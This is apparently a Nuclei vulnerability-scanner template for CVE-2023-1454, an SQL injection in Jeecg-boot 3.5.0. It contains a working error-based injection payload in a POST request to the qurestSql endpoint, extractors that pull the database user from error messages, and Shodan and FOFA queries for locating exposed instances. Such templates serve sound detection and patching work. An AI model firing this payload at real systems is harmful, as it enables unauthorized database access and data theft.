2023-06-20 18:22:13 +00:00
id : CVE-2023-1454
info :
name : Jeecg-boot 3.5.0 qurestSql - SQL Injection
author : DhiyaneshDK
severity : critical
description : |
2023-06-20 18:25:20 +00:00
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
2023-09-06 11:43:37 +00:00
remediation : |
Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor.
2023-06-20 18:22:13 +00:00
reference :
- https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master
- https://nvd.nist.gov/vuln/detail/CVE-2023-1454
2023-07-11 19:49:27 +00:00
- https://vuldb.com/?ctiid.223299
- https://vuldb.com/?id.223299
2024-03-23 09:28:19 +00:00
- https://github.com/Awrrays/FrameVul
2023-06-20 18:22:13 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-1454
cwe-id : CWE-89
2024-04-08 11:34:33 +00:00
epss-score : 0.04509
epss-percentile : 0.92282
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:*
2023-06-20 18:22:13 +00:00
metadata :
verified : "true"
2023-09-06 11:43:37 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : jeecg
product : jeecg-boot
2023-09-06 11:43:37 +00:00
shodan-query : http.favicon.hash:1380908726
2024-05-31 19:23:20 +00:00
fofa-query : icon_hash=1380908726
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,jeecg,sqli
2023-06-20 18:22:13 +00:00
http :
- raw :
- |
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json;charset=UTF-8
{"apiSelectId" : "1316997232402231298" , "id" : "1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '" }
matchers-condition : and
matchers :
- type : word
part : body
words :
- "SQLException"
- "XPATH syntax error:"
condition : and
- type : word
part : header
words :
- application/json
- type : status
status :
- 200
2023-06-20 18:48:52 +00:00
extractors :
- type : regex
group : 1
regex :
- "XPATH syntax error: '([a-z_@%]+)'"
- "XPATH syntax error: '([a-z- @%]+)'"
- "XPATH syntax error: '([a-z@%0-9.]+)'"
2023-07-11 19:49:27 +00:00
part : body
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100ae1a4096256e2a1c9542f440f000332fa0ba7ca07eb5425181f24e1083029ef4022068683c471f87d8e1566ef6a368e833b5e5caa8d0579c03aa83e07c89614345ca:922c64590222798bb761d5b6d8e72950